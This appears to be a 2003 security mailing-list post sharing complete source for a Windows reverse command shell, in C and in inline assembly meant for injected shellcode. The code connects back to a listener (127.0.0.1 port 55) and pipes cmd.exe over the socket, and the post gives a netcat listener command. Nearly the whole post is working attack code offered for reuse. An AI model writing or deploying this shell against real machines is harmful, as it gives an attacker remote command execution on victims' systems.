From: NetNinja [netninja@hotmail.kg] Sent: Friday, February 07, 2003 7:45 AM To: vuln-dev@securityfocus.com Subject: Windows reverse Shell #2 Hello folks, Thnx everyone for ur replies. Today i found time to have a careful look at my reverse shell C source code. THe problem that i had was very simple. In my C source i forgot to initilize STARTUPINFO struct to zero. That was the problem. 3APA3A's code did initilize that struct, so big thnx to him. Another thing u have to do is to cast socket handle returned from WSASocket call to ptr type and pass it on to stdInput,stdOutput and stdErr of STARTUPINFO struct. That's it! If anyone is interested in reverse cmd shell for windows i have included both C and inline asm version. so have a look at them. ---- C --------------- /* reverse cmd shell Will spit back command shell on ur listening netcat on ur localhost (127.0.0.2) port 55 set up ur netcat eg. nc -l -p 55 -vv Adik (netninja@hotmail.kg) http://netninja.to.kg */ #include #include #pragma comment(lib,"ws2_32") void main(int argc, char *argv[]) { WSADATA wsaData; SOCKET hSocket; STARTUPINFO si; PROCESS_INFORMATION pi; struct sockaddr_in adik_sin; memset(&adik_sin,0,sizeof(adik_sin)); memset(&si,0,sizeof(si)); WSAStartup(MAKEWORD(2,0),&wsaData); hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL); adik_sin.sin_family = AF_INET; adik_sin.sin_port = htons(55); adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1"); connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin)); si.cb = sizeof(si); si.dwFlags = STARTF_USESTDHANDLES; si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket; CreateProcess(NULL,"cmd",NULL,NULL,true,NULL,NULL,NULL,&si,&pi); ExitProcess(0); } ------[ end C ]-------------- ----[ inline ASM ]------ /* reverse cmd shell inline asm version reverse cmd shell on address 127.0.0.1 port 55 Adik (netninja@hotmail.kg) http://netninja.to.kg */ #include #include #pragma comment(lib,"ws2_32") #define GP 0x77E7B332 #define LL 0x77E7D961 #define CreateProcessA [ebp-8] #define ExitProcess [ebp-0ch] #define WSASocketA [ebp-10h] #define connect [ebp-14h] #define CMD_STR [ebp-18h] #define PORT 0x3700 //(htons(55)) here u gotta reverse byte order 0x0037=3700 #define IPADDR 0x0100007F // 7F000001//(inet_addr("127.0.0.1")) void main(int argc, char *argv[]) { char ptr[] = "kernel32\0CreateProcessA\0ExitProcess\0\0" "ws2_32\0WSASocketA\0connect\0\0\0cmd\0\0\0"; char *i=ptr; WSADATA wsaData; WSAStartup(MAKEWORD(2,0),&wsaData); //initialize winsock, this is not done below // usually when u inject ur shellcode into remote process // socket is already initialized __asm { mov edi, i dec edi push ebp mov ebp,esp sub esp,0x20 mov ecx,ebp sub ecx,4h push ecx load_lib: inc edi cmp byte ptr[edi],0 je done_loadin push edi mov eax, LL call eax //LoadLibrary("Lib") mov [ebp-4],eax //places lib handle into ebp-4 xor eax,eax repne scasb load_func: cmp byte ptr[edi],0 je load_lib push edi mov ebx, dword ptr[ebp-4] //lib handle push ebx mov eax, GP call eax //GetProcAddress("Function") pop ecx sub ecx,4 mov dword ptr[ecx], eax push ecx xor eax,eax repne scasb jmp load_func done_loadin: xor eax,eax inc edi mov dword ptr[ebp-18h],edi mov ecx,50 //make some space for structs push_em: push eax loop push_em push 0x1 push 0x2 call WSASocketA mov ebx, eax //copies sockethandle returned into ebx //ebp-20h mov dword ptr[ebp-40h],0x2 //sockaddr_in mov word ptr[ebp-3Eh],PORT mov dword ptr[ebp-3Ch],IPADDR //mov dword ptr[ebp-40h],process_information mov dword ptr[ebp-94h],0x44 //sizeof startupinfo mov dword ptr[ebp-68h],0x100 //dwFlags mov dword ptr[ebp-5Ch],ebx //stdio mov dword ptr[ebp-58h],ebx //stdout mov dword ptr[ebp-54h],ebx //stderr push 0x10 //sizeof sockaddr_in lea edx, dword ptr[ebp-40h] push edx //ptr to sockaddr_in push ebx //socket handle call connect lea edx,dword ptr[ebp-50h] push edx //push proc_info lea edx,dword ptr[ebp-94h] push edx //push ptr to startupinfo xor edx,edx push edx push edx push edx inc edx //inheritHandles = true push edx dec edx push edx push edx mov eax,CMD_STR //ptr to "cmd" str push eax push edx call CreateProcessA push edx call ExitProcess } } ----[ end ]------ -- Best regards, Adik (NetNinja) mailto:netninja@hotmail.kg